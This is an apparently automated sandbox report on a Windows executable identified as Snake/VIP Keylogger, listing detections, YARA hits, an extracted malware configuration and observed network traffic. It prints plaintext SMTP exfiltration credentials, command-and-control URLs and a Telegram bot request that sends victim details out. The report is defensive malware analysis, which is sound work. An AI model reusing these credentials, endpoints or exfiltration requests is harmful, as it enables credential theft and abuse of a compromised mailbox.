Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
TLS20242025.exe

Overview

General Information

Sample name:TLS20242025.exe
Analysis ID:1519460
MD5:bfabeaf94d00b7c6b4af9aa3463ff5a5
SHA1:0d9341d70a1e7e90c62ebcef43d1fcd2cf1b3506
SHA256:e03a2edda2530392f416b8d64b85a3ae890120e6c6d08317d21ac133576cb45d
Tags:exeuser-TeamDreier
Infos:

Detection

Snake Keylogger, VIP Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
AI detected suspicious sample
Machine Learning detection for sample
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • TLS20242025.exe (PID: 5748 cmdline: "C:\Users\user\Desktop\TLS20242025.exe" MD5: BFABEAF94D00B7C6B4AF9AA3463FF5A5)
    • TLS20242025.exe (PID: 5576 cmdline: "C:\Users\user\Desktop\TLS20242025.exe" MD5: BFABEAF94D00B7C6B4AF9AA3463FF5A5)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"Exfil Mode": "SMTP", "Email ID": "info@makupachemists.co.ke", "Password": "Makupa@2030#", "Host": "mail.makupachemists.co.ke", "Port": "587", "Version": "4.4"}
{"Exfil Mode": "SMTP", "Username": "info@makupachemists.co.ke", "Password": "Makupa@2030#", "Host": "mail.makupachemists.co.ke", "Port": "587", "Version": "4.4"}
SourceRuleDescriptionAuthorStrings
00000002.00000002.4583199335.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000002.00000002.4583199335.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
      00000002.00000002.4583199335.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
        00000002.00000002.4583199335.0000000000402000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
        • 0x2d10f:$a1: get_encryptedPassword
        • 0x2d424:$a2: get_encryptedUsername
        • 0x2cf1f:$a3: get_timePasswordChanged
        • 0x2d028:$a4: get_passwordField
        • 0x2d125:$a5: set_encryptedPassword
        • 0x2e7bd:$a7: get_logins
        • 0x2e720:$a10: KeyLoggerEventArgs
        • 0x2e385:$a11: KeyLoggerEventArgsEventHandler
        00000002.00000002.4585576245.0000000002B11000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
          Click to see the 12 entries
          SourceRuleDescriptionAuthorStrings
          0.2.TLS20242025.exe.3a92840.3.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            0.2.TLS20242025.exe.3a92840.3.unpackJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
              0.2.TLS20242025.exe.3a92840.3.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                2.2.TLS20242025.exe.400000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                  2.2.TLS20242025.exe.400000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
                    Click to see the 34 entries
                    No Sigma rule has matched
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-09-26T15:19:08.396649+020028033053Unknown Traffic192.168.2.649715188.114.97.3443TCP
                    2024-09-26T15:19:10.641160+020028033053Unknown Traffic192.168.2.649720188.114.97.3443TCP
                    2024-09-26T15:19:11.733633+020028033053Unknown Traffic192.168.2.649724188.114.97.3443TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-09-26T15:19:06.686781+020028032742Potentially Bad Traffic192.168.2.649710193.122.130.080TCP
                    2024-09-26T15:19:07.811792+020028032742Potentially Bad Traffic192.168.2.649710193.122.130.080TCP
                    2024-09-26T15:19:08.921191+020028032742Potentially Bad Traffic192.168.2.649717193.122.130.080TCP

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Source: http://aborters.duckdns.org:8081URL Reputation: Label: malware
                    Source: http://anotherarmy.dns.army:8081URL Reputation: Label: malware
                    Source: 00000002.00000002.4583199335.0000000000402000.00000040.00000400.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "info@makupachemists.co.ke", "Password": "Makupa@2030#", "Host": "mail.makupachemists.co.ke", "Port": "587", "Version": "4.4"}
                    Source: 2.2.TLS20242025.exe.400000.0.unpackMalware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "info@makupachemists.co.ke", "Password": "Makupa@2030#", "Host": "mail.makupachemists.co.ke", "Port": "587", "Version": "4.4"}
                    Source: TLS20242025.exeReversingLabs: Detection: 35%
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Source: TLS20242025.exeJoe Sandbox ML: detected

                    Location Tracking

                    barindex
                    Source: unknownDNS query: name: reallyfreegeoip.org
                    Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49713 version: TLS 1.0
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49734 version: TLS 1.2
                    Source: TLS20242025.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: C:\Users\GT350\source\repos\UpdatedRunpe\UpdatedRunpe\obj\x86\Debug\AQipUvwTwkLZyiCs.pdb source: TLS20242025.exe, 00000000.00000002.4587810220.0000000005200000.00000004.08000000.00040000.00000000.sdmp, TLS20242025.exe, 00000000.00000002.4585419626.000000000297D000.00000004.00000800.00020000.00000000.sdmp
                    Source: C:\Users\user\Desktop\TLS20242025.exeCode function: 4x nop then jmp 0105F45Dh2_2_0105F2C0
                    Source: C:\Users\user\Desktop\TLS20242025.exeCode function: 4x nop then jmp 0105F45Dh2_2_0105F52F
                    Source: C:\Users\user\Desktop\TLS20242025.exeCode function: 4x nop then jmp 0105F45Dh2_2_0105F4AC
                    Source: C:\Users\user\Desktop\TLS20242025.exeCode function: 4x nop then jmp 0105FC19h2_2_0105F974
                    Source: C:\Users\user\Desktop\TLS20242025.exeCode function: 4x nop then jmp 067D31E0h2_2_067D2DC8
                    Source: C:\Users\user\Desktop\TLS20242025.exeCode function: 4x nop then jmp 067DE501h2_2_067DE258
                    Source: C:\Users\user\Desktop\TLS20242025.exeCode function: 4x nop then jmp 067D0D0Dh2_2_067D0B30
                    Source: C:\Users\user\Desktop\TLS20242025.exeCode function: 4x nop then jmp 067D1697h2_2_067D0B30
                    Source: C:\Users\user\Desktop\TLS20242025.exeCode function: 4x nop then jmp 067D2C19h2_2_067D2968
                    Source: C:\Users\user\Desktop\TLS20242025.exeCode function: 4x nop then jmp 067DE0A9h2_2_067DDE00
                    Source: C:\Users\user\Desktop\TLS20242025.exeCode function: 4x nop then jmp 067DE959h2_2_067DE6B0
                    Source: C:\Users\user\Desktop\TLS20242025.exeCode function: 4x nop then jmp 067DF209h2_2_067DEF60
                    Source: C:\Users\user\Desktop\TLS20242025.exeCode function: 4x nop then jmp 067DCF49h2_2_067DCCA0
                    Source: C:\Users\user\Desktop\TLS20242025.exeCode function: 4x nop then jmp 067DD7F9h2_2_067DD550
                    Source: C:\Users\user\Desktop\TLS20242025.exeCode function: 4x nop then jmp 067D31E0h2_2_067D2DB8
                    Source: C:\Users\user\Desktop\TLS20242025.exeCode function: 4x nop then jmp 067DEDB1h2_2_067DEB08
                    Source: C:\Users\user\Desktop\TLS20242025.exeCode function: 4x nop then jmp 067DF661h2_2_067DF3B8
                    Source: C:\Users\user\Desktop\TLS20242025.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h2_2_067D0040
                    Source: C:\Users\user\Desktop\TLS20242025.exeCode function: 4x nop then jmp 067DFAB9h2_2_067DF810
                    Source: C:\Users\user\Desktop\TLS20242025.exeCode function: 4x nop then jmp 067DD3A1h2_2_067DD0F8
                    Source: C:\Users\user\Desktop\TLS20242025.exeCode function: 4x nop then jmp 067D31E0h2_2_067D310E
                    Source: C:\Users\user\Desktop\TLS20242025.exeCode function: 4x nop then jmp 067DDC51h2_2_067DD9A8

                    Networking

                    barindex
                    Source: unknownDNS query: name: api.telegram.org
                    Source: Yara matchFile source: 2.2.TLS20242025.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.TLS20242025.exe.3a92840.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.TLS20242025.exe.3a4fe10.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.TLS20242025.exe.3959d70.4.raw.unpack, type: UNPACKEDPE
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:123716%0D%0ADate%20and%20Time:%2026/09/2024%20/%2020:05:16%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20123716%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                    Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                    Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
                    Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
                    Source: Joe Sandbox ViewIP Address: 193.122.130.0 193.122.130.0
                    Source: Joe Sandbox ViewASN Name: TELEGRAMRU TELEGRAMRU
                    Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                    Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                    Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                    Source: unknownDNS query: name: checkip.dyndns.org
                    Source: unknownDNS query: name: reallyfreegeoip.org
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49717 -> 193.122.130.0:80
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49710 -> 193.122.130.0:80
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49715 -> 188.114.97.3:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49724 -> 188.114.97.3:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49720 -> 188.114.97.3:443
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49713 version: TLS 1.0
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:123716%0D%0ADate%20and%20Time:%2026/09/2024%20/%2020:05:16%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20123716%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                    Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                    Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 26 Sep 2024 13:19:16 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                    Source: TLS20242025.exe, 00000000.00000002.4585821019.00000000038E1000.00000004.00000800.00020000.00000000.sdmp, TLS20242025.exe, 00000002.00000002.4583199335.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
                    Source: TLS20242025.exe, 00000000.00000002.4585821019.00000000038E1000.00000004.00000800.00020000.00000000.sdmp, TLS20242025.exe, 00000002.00000002.4583199335.0000000000402000.00000040.00000400.00020000.00000000.sdmp, TLS20242025.exe, 00000002.00000002.4585576245.0000000002B11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
                    Source: TLS20242025.exe, 00000000.00000002.4585821019.00000000038E1000.00000004.00000800.00020000.00000000.sdmp, TLS20242025.exe, 00000002.00000002.4583199335.0000000000402000.00000040.00000400.00020000.00000000.sdmp, TLS20242025.exe, 00000002.00000002.4585576245.0000000002B11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
                    Source: TLS20242025.exe, 00000002.00000002.4585576245.0000000002B11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                    Source: TLS20242025.exe, 00000002.00000002.4583576880.0000000000CF7000.00000004.00000020.00020000.00000000.sdmp, TLS20242025.exe, 00000002.00000002.4585576245.0000000002B11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                    Source: TLS20242025.exe, 00000000.00000002.4585821019.00000000038E1000.00000004.00000800.00020000.00000000.sdmp, TLS20242025.exe, 00000002.00000002.4583199335.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                    Source: TLS20242025.exe, 00000002.00000002.4585576245.0000000002B11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: TLS20242025.exe, 00000000.00000002.4585821019.00000000038E1000.00000004.00000800.00020000.00000000.sdmp, TLS20242025.exe, 00000002.00000002.4583199335.0000000000402000.00000040.00000400.00020000.00000000.sdmp, TLS20242025.exe, 00000002.00000002.4585576245.0000000002B11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
                    Source: TLS20242025.exe, 00000002.00000002.4588181134.0000000003E20000.00000004.00000800.00020000.00000000.sdmp, TLS20242025.exe, 00000002.00000002.4588181134.0000000003B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                    Source: TLS20242025.exe, 00000002.00000002.4585576245.0000000002BF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                    Source: TLS20242025.exe, 00000000.00000002.4585821019.00000000038E1000.00000004.00000800.00020000.00000000.sdmp, TLS20242025.exe, 00000002.00000002.4583199335.0000000000402000.00000040.00000400.00020000.00000000.sdmp, TLS20242025.exe, 00000002.00000002.4585576245.0000000002BF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                    Source: TLS20242025.exe, 00000002.00000002.4585576245.0000000002BF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
                    Source: TLS20242025.exe, 00000002.00000002.4585576245.0000000002BF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:123716%0D%0ADate%20a
                    Source: TLS20242025.exe, 00000002.00000002.4588181134.0000000003E20000.00000004.00000800.00020000.00000000.sdmp, TLS20242025.exe, 00000002.00000002.4588181134.0000000003B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                    Source: TLS20242025.exe, 00000002.00000002.4588181134.0000000003E20000.00000004.00000800.00020000.00000000.sdmp, TLS20242025.exe, 00000002.00000002.4588181134.0000000003B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                    Source: TLS20242025.exe, 00000002.00000002.4588181134.0000000003E20000.00000004.00000800.00020000.00000000.sdmp, TLS20242025.exe, 00000002.00000002.4588181134.0000000003B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                    Source: TLS20242025.exe, 00000002.00000002.4585576245.0000000002CA7000.00000004.00000800.00020000.00000000.sdmp, TLS20242025.exe, 00000002.00000002.4585576245.0000000002CD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
                    Source: TLS20242025.exe, 00000002.00000002.4585576245.0000000002C98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enP
                    Source: TLS20242025.exe, 00000002.00000002.4585576245.0000000002CA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enlB
                    Source: TLS20242025.exe, 00000002.00000002.4588181134.0000000003E20000.00000004.00000800.00020000.00000000.sdmp, TLS20242025.exe, 00000002.00000002.4588181134.0000000003B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                    Source: TLS20242025.exe, 00000002.00000002.4588181134.0000000003E20000.00000004.00000800.00020000.00000000.sdmp, TLS20242025.exe, 00000002.00000002.4588181134.0000000003B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                    Source: TLS20242025.exe, 00000002.00000002.4588181134.0000000003E20000.00000004.00000800.00020000.00000000.sdmp, TLS20242025.exe, 00000002.00000002.4588181134.0000000003B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                    Source: TLS20242025.exe, 00000002.00000002.4585576245.0000000002BF6000.00000004.00000800.00020000.00000000.sdmp, TLS20242025.exe, 00000002.00000002.4585576245.0000000002BD0000.00000004.00000800.00020000.00000000.sdmp, TLS20242025.exe, 00000002.00000002.4585576245.0000000002B60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                    Source: TLS20242025.exe, 00000000.00000002.4585821019.00000000038E1000.00000004.00000800.00020000.00000000.sdmp, TLS20242025.exe, 00000002.00000002.4583199335.0000000000402000.00000040.00000400.00020000.00000000.sdmp, TLS20242025.exe, 00000002.00000002.4585576245.0000000002B60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                    Source: TLS20242025.exe, 00000002.00000002.4585576245.0000000002B8A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33
                    Source: TLS20242025.exe, 00000002.00000002.4585576245.0000000002BF6000.00000004.00000800.00020000.00000000.sdmp, TLS20242025.exe, 00000002.00000002.4585576245.0000000002BD0000.00000004.00000800.00020000.00000000.sdmp, TLS20242025.exe, 00000002.00000002.4585576245.0000000002B8A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33$
                    Source: TLS20242025.exe, 00000002.00000002.4588181134.0000000003E20000.00000004.00000800.00020000.00000000.sdmp, TLS20242025.exe, 00000002.00000002.4588181134.0000000003B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                    Source: TLS20242025.exe, 00000002.00000002.4588181134.0000000003E20000.00000004.00000800.00020000.00000000.sdmp, TLS20242025.exe, 00000002.00000002.4588181134.0000000003B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                    Source: TLS20242025.exe, 00000002.00000002.4585576245.0000000002CD8000.00000004.00000800.00020000.00000000.sdmp, TLS20242025.exe, 00000002.00000002.4585576245.0000000002CC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
                    Source: TLS20242025.exe, 00000002.00000002.4585576245.0000000002CC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/P
                    Source: TLS20242025.exe, 00000002.00000002.4585576245.0000000002CD3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lB
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
